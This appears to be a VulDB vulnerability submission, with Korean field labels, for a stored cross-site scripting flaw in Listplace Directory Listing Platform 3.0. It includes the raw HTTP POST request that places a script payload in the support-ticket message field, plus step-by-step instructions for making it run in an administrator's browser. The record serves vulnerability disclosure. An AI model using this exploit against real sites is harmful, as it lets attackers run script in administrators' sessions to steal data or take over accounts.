| 제목 | Directory Listing Platform 3.0 - Stored XSS |
|---|
| 설명 | # Exploit Title: Listplace Directory Listing Platform 3.0 - Stored XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 12/07/2023
# Vendor: Bug Finder
# Vendor Homepage: https://bugfinder.net/
# Software Link: https://bugfinder.net/product/listplace-a-complete-directory-listing-platform/22
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
Path: /listplace/user/ticket/create
POST parameter 'message' is vulnerable to XSS
-----------------------------------------------------------
POST /listplace/user/ticket/create HTTP/2
Content-Disposition: form-data; name="subject"
Any-Subject
-----------------------------------------------------------
Content-Disposition: form-data; name="message"
<script>alert(1)</script>
-----------------------------------------------------------
## Steps to Reproduce:
1. Login as (Normal User)
2. Go to [Support Ticket] on this Path: https://website/listplace/user/ticket
3. Click on [Create Ticket] on this Path: https://website/listplace/user/ticket/create
4. Enter Any Subject
5. Inject your XSS Payload in [Message Box]
6. Click on [Submit]
7. When ADMIN visit [SUPPORT TICKETS] on this Path : https://website/listplace/admin/tickets and Open the [New Pending Ticket]
8. XSS Will Fire and Executed on his Browser
[-] Done |
|---|
| 사용자 | skalvin (UID 49463) |
|---|
| 제출 | 2023. 07. 12. PM 08:06 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 07. 21. PM 10:26 (9 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 235148 [Bug Finder Listplace Directory Listing Platform 3.0 HTTP POST Request create 메시지 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|